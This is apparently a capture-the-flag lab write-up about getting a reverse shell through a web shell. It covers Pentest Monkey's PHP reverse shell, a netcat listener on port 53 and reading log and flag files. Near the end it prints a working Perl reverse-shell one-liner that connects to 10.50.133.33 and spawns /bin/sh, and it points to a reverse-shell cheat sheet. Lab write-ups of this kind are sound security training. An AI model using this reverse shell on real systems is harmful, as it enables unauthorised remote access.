First Contact

Get a reverseshell

We have identified a potential attack surface that we can use to execute php and shell commands on. We are able to execute a reverse shell on the web shell in order to get a shell back on the machine.

Uploading a php Reverseshell

For the PHP reverse shell, we’ll be using Pentest Monkey’s reverse shell found here or in kali under /usr/share/webshells/php/php-reverse-shell.php

1. Modify the reverse shell to your tun0 IP address and port.

2. Paste php code into webshell. Note: First line <?php and last line ?> needs to be removed

3. start netcat listener on port 53

4. Execute reverseshell

Problem with netcat listener on port 53

Kill systemd-resolv process and start netcat listener again

Execute the reverseshell:

To answer the questions and find the flag I need to focus myself on logs

Searching for logs: cd /var/log

content of /var/log

content of login.log and flag.txt

Getting the root flag

content of rot.txt

Additional way to get a reverseshell

PayloadsAllTheThings/Methodology and Resources/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

reverseshell cheatsheet

perl -e 'use Socket;$i="10.50.133.33";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Execute perl reverse shell

Questions